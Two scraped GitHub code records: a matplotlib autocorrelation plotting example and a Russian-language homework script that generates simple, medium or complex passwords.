+{"seq_id":"72265094936","text":"# Implementation of matplotlib.pyplot.acorr()\n# function\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Fixing random state for reproducibility\nnp.random.seed(10**7)\n\ngeeks = np.random.randn(51)\nfig = plt.figure(figsize = (10,10))\n\nplt.title(\"Autocorrelation Example\")\nplt.acorr(geeks, usevlines = True, normed = True, maxlags = 50, lw = 2)\n\nplt.grid(True)\nfig.savefig('acorr_function_exp2.pdf',bbox_inches='tight')\n","repo_name":"Python-Learning-SJ/matplotlib","sub_path":"acorr_function_exp2.py","file_name":"acorr_function_exp2.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17271509929","text":"\"\"\"\n Генератор паролей.\n Пользователь выбирает 1 из 3 вариантов:\n 1. Сгенерировать простой пароль (только буквы в нижнем регистре, 8 символов)\n 2. Сгенерировать средний пароль (любые буквы и цифры, 8 символов)\n 3. Сгенерировать сложный пароль (минимум 1 большая буква, 1 маленькая, 1 цифра и 1 спец-символ, длина от 8 до 16 символов)\n (для 3 пункта можно генерировать пароли до тех пор, пока не выполнится условие)\n\n Для решения использовать:\n - константы строк из модуля string (ascii_letters, digits и т.д.)\n - функцию choice из модуля random (для выборки случайного элемента из последовательности)\n - функцию randint из модуля random (для генерации случайной длины сложного пароля от 8 до 16 символов)\n\n\n Дополнительно (не влияет на оценку):\n 1. Позволить пользователю выбирать длину пароля, но предупреждать, что\n пароль ненадежный, если длина меньше 8 символов\n 2. Добавить еще вариант генерации пароля - 4. Пользовательский пароль:\n - пользователь вводил пул символов, из которых будет генерироваться пароль\n - вводит длину желаемого пароля\n - программа генерирует пароль из нужной длины из введенных символов\n - * игнорируются пробелы\n\"\"\"\n# ОСНОВНОЕ ЗАДАНИЕ\nfrom random import choice, randint\nimport string\n\n\ndef main():\n try:\n choice_pasword = int(input('Сгенерировать простой пароль - 1'\n 'Сгенерировать средний пароль - 2'\n 'Сгенерировать сложний пароль - 3:'))\n except ValueError:\n print('Введите число от 1 до 3')\n return main()\n length = 8 # для 1 и 2 задния\n length_2 = randint(8, 16) # для 3\n\n small = string.ascii_lowercase\n big = string.ascii_uppercase\n spec = string.punctuation\n digits = string.digits\n all_symbols = spec+digits+big+small\n average = small+big+digits\n pas = ''\n if choice_pasword > 4:\n print('Введите число от 1 до 3')\n return main()\n if choice_pasword == 1:\n pas = pas + choice(small)\n while len(pas) < length:\n pas += choice(small)\n if choice_pasword == 2:\n pas = pas + choice(average)\n while len(pas) < length:\n pas += choice(average)\n if choice_pasword == 3:\n pas += choice(digits)\n pas += choice(small)\n pas += choice(big)\n pas += choice(spec)\n while len(pas) < length_2:\n pas += choice(all_symbols)\n print(pas)\n\n\nmain()\n\n# ДОПОЛНИТЕЛЬНОЕ\n\n\ndef main1():\n words_for_password = input('Введите символы для будущего пароля: ')\n words = words_for_password.replace(' ', '')\n length_3 = int(input('Введите кол символов для пароля - \"Больше 8\" :'))\n pas = ''\n if len(words) < 8 or length_3 < 8:\n print('Пароль не надежный.\\nВведите больше 8 символов')\n return main1()\n else:\n pas = pas + choice(words)\n while len(pas) < length_3:\n pas += choice(words)\n 
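For reference on the `plt.acorr(..., normed=True)` call above: the normalized autocorrelation it plots is the raw correlation divided by its zero-lag value. The same numbers can be computed by hand with NumPy (a sketch using a fresh random sequence rather than the seeded one above):

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.standard_normal(51)

maxlags = 5
full = np.correlate(x, x, mode="full")         # lags -(N-1) .. N-1
mid = len(full) // 2                           # index of lag 0
acf = full[mid:mid + maxlags + 1] / full[mid]  # normalize by zero lag
print(np.round(acf, 3))                        # acf[0] is always 1.0
```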
print(pas)\n\n\nmain1()\n","repo_name":"Sersh4745/python_learn","sub_path":"Diachenko.hw5/password_gen.py","file_name":"password_gen.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
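One hardening note for the password generator above: `random.choice` is fine for exercises, but it is not cryptographically secure. A variant of option 3 built on the `secrets` module (structure mirrored from the code above; names are illustrative):

```python
import secrets
import string

def strong_password(length=12):
    """Like option 3 above, but drawing randomness from secrets."""
    pools = [string.ascii_lowercase, string.ascii_uppercase,
             string.digits, string.punctuation]
    # One guaranteed character per class, then fill from the full pool.
    chars = [secrets.choice(pool) for pool in pools]
    alphabet = "".join(pools)
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    # Shuffle so the guaranteed characters are not always at the front.
    secrets.SystemRandom().shuffle(chars)
    return "".join(chars)

print(strong_password())
```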